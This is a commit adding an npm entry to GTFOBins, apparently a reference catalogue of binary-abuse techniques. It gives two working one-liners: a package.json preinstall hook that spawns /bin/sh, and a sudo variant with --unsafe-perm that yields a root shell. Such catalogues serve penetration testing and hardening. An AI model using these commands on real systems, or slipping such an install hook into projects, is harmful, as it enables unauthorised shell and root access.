This commit is contained in:
Andrea Cardaci
2021-01-21 15:11:28 +01:00
committed by GitHub

13
_gtfobins/npm.md Normal file
View File

@@ -0,0 +1,13 @@
---
functions:
shell:
- code: |
TF=$(mktemp -d)
echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
npm -C $TF i
sudo:
- code: |
TF=$(mktemp -d)
echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
sudo npm -C $TF --unsafe-perm i
---